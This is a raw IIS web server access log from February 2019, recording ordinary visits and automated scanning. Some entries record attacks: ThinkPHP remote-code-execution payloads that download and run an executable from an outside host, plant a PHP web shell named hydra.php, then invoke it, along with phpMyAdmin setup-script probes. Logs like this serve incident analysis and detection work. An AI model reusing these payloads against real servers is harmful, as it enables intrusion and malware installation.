#Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2019-02-23 00:31:12 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2019-02-23 00:31:12 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - 200 0 0 656 2019-02-23 00:31:12 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - 200 0 0 234 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2019-02-23 03:00:28 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2019-02-23 03:00:28 192.168.0.14 GET /mysql/admin/index.php lang=en 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/71.0.3578.98+Safari/537.36 - 404 0 2 343 2019-02-23 03:00:28 192.168.0.14 GET /mysql/dbadmin/index.php lang=en 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/71.0.3578.98+Safari/537.36 - 404 0 2 296 2019-02-23 03:00:29 192.168.0.14 GET /mysql/sqlmanager/index.php lang=en 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/71.0.3578.98+Safari/537.36 - 404 0 2 328 2019-02-23 03:00:29 192.168.0.14 GET /mysql/mysqlmanager/index.php lang=en 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/71.0.3578.98+Safari/537.36 - 404 0 2 218 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2019-02-23 03:29:38 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2019-02-23 03:29:38 192.168.0.14 HEAD / - 80 - 192.168.0.1 Python-urllib/2.7 - 200 0 0 343 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2019-02-23 03:54:26 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2019-02-23 03:54:26 192.168.0.14 GET / - 80 - 192.168.0.1 Cloud+mapping+experiment.+Contact+research@pdrlabs.net - 200 0 0 421 2019-02-23 04:03:22 192.168.0.14 GET / - 80 - 192.168.0.1 - - 200 0 0 328 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2019-02-23 05:22:27 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2019-02-23 05:22:27 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - 200 0 0 437 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2019-02-23 06:13:15 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2019-02-23 06:13:15 192.168.0.14 GET / - 80 - 192.168.0.1 masscan/1.0+(https://github.com/robertdavidgraham/masscan) - 200 0 0 375 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2019-02-23 07:30:38 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2019-02-23 07:30:38 192.168.0.14 GET /public/index.php s=index/think%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/10.exe');start%20C:/10.exe 80 - 192.168.0.1 Mozilla/5.0+(compatible;+MSIE+9.0;+Windows+NT+6.1;+WOW64;+Trident/5.0) - 404 0 2 1437 2019-02-23 07:30:42 192.168.0.14 GET /public/index.php s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo%20%5E%3C?php%20$action%20=%20$_GET%5B'xcmd'%5D;system($action);?%5E%3E%3Ehydra.php 80 - 192.168.0.1 Mozilla/5.0+(compatible;+MSIE+9.0;+Windows+NT+6.1;+WOW64;+Trident/5.0) - 404 0 2 484 2019-02-23 07:30:42 192.168.0.14 GET /public/hydra.php xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/10.exe');start%20C:/10.exe 80 - 192.168.0.1 Mozilla/5.0+(compatible;+MSIE+9.0;+Windows+NT+6.1;+WOW64;+Trident/5.0) - 404 0 2 750 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2019-02-23 08:03:10 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2019-02-23 08:03:10 192.168.0.14 GET / - 80 - 192.168.0.1 - - 200 0 0 218 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2019-02-23 08:36:11 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2019-02-23 08:36:11 192.168.0.14 GET /v1/agent/self - 80 - 192.168.0.1 - - 404 0 2 500 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2019-02-23 09:40:04 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2019-02-23 09:40:04 192.168.0.14 GET /w00tw00t.at.blackhats.romanian.anti-sec:) - 80 - 192.168.0.1 ZmEu - 404 0 2 249 2019-02-23 09:40:04 192.168.0.14 GET /phpMyAdmin/scripts/setup.php - 80 - 192.168.0.1 ZmEu - 404 0 2 140 2019-02-23 09:40:04 192.168.0.14 GET /phpmyadmin/scripts/setup.php - 80 - 192.168.0.1 ZmEu - 404 0 2 171 2019-02-23 09:40:04 192.168.0.14 GET /pma/scripts/setup.php - 80 - 192.168.0.1 ZmEu - 404 0 2 171 2019-02-23 09:40:05 192.168.0.14 GET /myadmin/scripts/setup.php - 80 - 192.168.0.1 ZmEu - 404 0 2 171 2019-02-23 09:40:05 192.168.0.14 GET /MyAdmin/scripts/setup.php - 80 - 192.168.0.1 ZmEu - 404 0 2 171 2019-02-23 09:40:07 192.168.0.14 GET /mysqladmin/scripts/setup.php - 80 - 192.168.0.1 ZmEu - 404 0 2 156 2019-02-23 09:40:07 192.168.0.14 GET /dbadmin/scripts/setup.php - 80 - 192.168.0.1 ZmEu - 404 0 2 187 2019-02-23 09:40:07 192.168.0.14 GET /admin/phpmyadmin/scripts/setup.php - 80 - 192.168.0.1 ZmEu - 404 0 2 140 2019-02-23 09:40:08 192.168.0.14 GET /db/scripts/setup.php - 80 - 192.168.0.1 ZmEu - 404 0 2 172 2019-02-23 09:40:08 192.168.0.14 GET /php-my-admin/scripts/setup.php - 80 - 192.168.0.1 ZmEu - 404 0 2 157 2019-02-23 09:40:08 192.168.0.14 GET /web/phpMyAdmin/scripts/setup.php - 80 - 192.168.0.1 ZmEu - 404 0 2 171 2019-02-23 09:40:08 192.168.0.14 GET /websql/scripts/setup.php - 80 - 192.168.0.1 ZmEu - 404 0 2 140 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2019-02-23 13:04:47 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2019-02-23 13:04:47 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - 200 0 0 515